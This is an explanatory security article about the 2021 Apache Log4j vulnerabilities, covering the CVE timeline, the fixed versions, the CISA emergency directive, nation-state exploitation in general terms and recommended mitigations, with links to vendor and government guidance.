What is Log4j Vulnerability?

Log4j is Apache developed logging tool used in many java-based applications. This is widely used by both enterprise apps and cloud services.

Log4shell vulnerability is an unauthenticated RCE vulnerability allowing complete system takeover on systems with Log4j 2.0-beta9 up to 2.14.1 and is tracked as CVE-2021-44228. Apache released Log4j 2.15.0 to address is flaw in CVE-2021-44228 RCE vulnerability.

On 11^th December 2021 Microsoft Threat Intelligence Center state that “The CVE-2021-44228 vulnerability allows unauthenticated remote code execution, and it is triggered when a specially crafted string provided by the attacker through a variety of different input vectors is parsed and processed by the Log4j 2 vulnerable component.”

However, this fix addressed the flaw in certain non-default configurations and Apache had to release a new version. Timeline of the Log4j Vulnerability

• CVE-2021-44228 – On December 10, 2021, Apache released Log4j 2.15.0 for Java 8 users to address a remote code execution (RCE) vulnerability
• CVE-2021-45046 – On December 13, 2021, Apache released Log4j 2.12.2 for Java 7 users and Log4j 2.16.0 for Java 8 users to address a RCE vulnerability
• CVE-2021-45105 – On December 17, 2021, Apache released Log4j 2.17.0 for Java 8 users to address a denial-of-service (DOS) vulnerability

On 17^th December 2021 CISA Issues ED 22-02 Directing Federal Agencies to Mitigate Apache Log4j Vulnerabilities advising the federal civilian entities to take immediate action against the recently discovered vulnerability in Log4j software. Until December 23 the directive gives federal agencies to give details of all of the internet-facing installations of the software on their networks to CISA.

Exploitation

The first vulnerability CVE-2021-44228 (aka Log4Shell) was reported by Alibaba Cloud security team on 24^th November 2021. But when Chinese security researcher p0rz9 publicly disclosed the first Proof-of-concept exploit threat actors began to scan systems venerable to this remotely exploitable security flaw.

After the disclosure Nation-state actors from China, Iran, North Korea, and Turkey start abusing the Log4Shell in the Log4J library in their campaigns. Apache fix this vulnerability in Log4j 2.15.0. However, this fix addressed the flaw in certain non-default configurations.

“It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), attackers with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern, resulting in an information leak and remote code execution in some environments and local code execution in all environments; remote code execution has been demonstrated on macOS but no other tested environments.”

This second Vulnerability is tracked as CVE-2021-45046 Apache Log4j2 Thread Context Lookup Pattern vulnerable to remote code execution in certain non-default configurations and is fixed in version Log4j 2.16.0.

However, Apache was forced to release another new version (Log4j 2.17.0) to fix CVE-2021-45105 a High severity Denial of Service (DoS) vulnerability in the log4j 2.16.

“Apache Log4j2 versions 2.0-alpha1 through 2.16.0 did not protect from uncontrolled recursion from self-referential lookups. When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), attackers with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup, resulting in a StackOverflowError that will terminate the process. This is also known as a DOS (Denial of Service) attack.

Mitigation

CISA recommends the following,

• Determine whether your organization’s products with Log4j are vulnerable
• Review Apache’s Log4j Security Vulnerabilities page for additional information and
• Apply available patches immediately
• Conduct a security review to determine if there is a security concern or compromise.
• Consider reporting compromises immediately to CISA and the FBI.

Reference

• https://logging.apache.org/log4j/2.x/security.html
• https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/
• https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance
• https://www.cisa.gov/emergency-directive-22-02